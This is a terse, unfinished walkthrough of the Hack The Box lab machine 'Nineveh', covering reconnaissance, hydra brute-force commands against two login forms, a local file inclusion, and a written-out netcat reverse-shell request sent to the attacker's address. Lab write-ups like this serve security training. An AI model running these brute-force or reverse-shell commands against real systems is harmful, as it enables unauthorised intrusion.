HTB Write-up Nineveh
nmap:
port 80 returned nothing but after configuring nineveh.htb to /etc/hosts, I got
ran the gobuster on the site.
Found a login page.
possible usernames - admin , amrois
MySQL in installed..?
tried different sqlmap options but had not luck..?
Trying to crack it with hydra:
hydra -l admin -P ~/rockyou.txt 10.129.141.83 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 54
password = 1q2w3e4r5t
http admin page:
notes page has LFI vuln?
include(): it's executing the php codes
This cool trick below encodes the php source code so we can read it
in this case it doesn't work.
HTTPS enum
admin@nineveh.htb
After performing go buster, I found a phpLiteAdmin v1.9 login form.
interesting warning.
hydra
hydra -l admin -P ~/rockyou.txt nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:F=Incorrect"
Password123
Code execution on the site
Used this exploit: https://www.exploit-db.com/exploits/24044
now we can execute commands.
Sending it to burp and modify what we send to
GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.131+4444+>/tmp/f
Got the reverse shell but not tty
cannot complete due to slowness of the machine!
Last updated